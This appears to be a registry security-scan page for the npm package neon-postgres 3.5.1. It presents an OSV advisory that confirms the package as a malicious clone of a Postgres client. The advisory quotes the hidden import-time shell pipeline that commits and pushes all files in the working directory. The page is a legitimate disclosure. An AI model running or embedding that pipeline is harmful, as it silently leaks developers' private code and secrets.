registry  /  neon-postgres  /  3.5.1

neon-postgres@3.5.1

OSV Malicious Advisory

scanned 2h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-10537 confirms this npm version as malicious. neon-postgres is a clone of the porsager/postgres client with package metadata (repository, author, homepage) still pointing at the upstream project. Both the CommonJS and ESM entrypoints contain a top-level child_process.exec call that runs a shell pipeline in the caller's current working directory: `pwd && ls -la && git status && git add * && git commit -m "sync" && git push -u origin main`...

Advisory
MAL-2026-10537
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in neon-postgres (npm)
Details
neon-postgres is a clone of the porsager/postgres client with package metadata (repository, author, homepage) still pointing at the upstream project. Both the CommonJS and ESM entrypoints contain a top-level child_process.exec call that runs a shell pipeline in the caller's current working directory: `pwd && ls -la && git status && git add * && git commit -m "sync" && git push -u origin main`. This fires the moment any consumer `require()`s or `import`s the package (directly or via a transitive dependency), using the credentials configured on the installer's host. Effects on the installer: (1) all untracked and uncommitted files in the CWD are staged and committed, potentially including secrets, local.env files, build artifacts, and private material the developer never intended to publish; (2) that commit is pushed to whatever remote `origin` is configured, which can leak private code to a fork or overwrite branch state on the real repository; (3) the operation runs silently as a side-effect of importing what appears to be a postgres client. The `neon-postgres` name impersonates the legitimate Neon serverless-postgres ecosystem while carrying this payload.
Decision reason
No blocking static signals were detected.

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessCryptoEnvironmentVarsFilesystemShell
Supply chain
HighEntropyStrings
ManifestNo manifest risk signals triggered.
scanned 31 file(s), 218 KB of source

Source & flagged code

1 flagged · loading source
cf/src/connection.jsView file
19L20: const Sync = b().S().end() L21: , Flush = b().H().end() ... L248: function write(x, fn) { L249: chunk = chunk ? Buffer.concat([chunk, x]) : Buffer.from(x) L250: if (fn || chunk.length >= 1024) ... L290: socket.removeAllListeners() L291: socket = tls.connect(options) L292: socket.on('secureConnect', connected)
Low
Weak Crypto

Package source references weak cryptographic algorithms.

cf/src/connection.jsView on unpkg · L19

Findings

1 Medium4 Low
MediumEnvironment Vars
LowScripts Present
LowWeak Cryptocf/src/connection.js
LowFilesystem
LowHigh Entropy Strings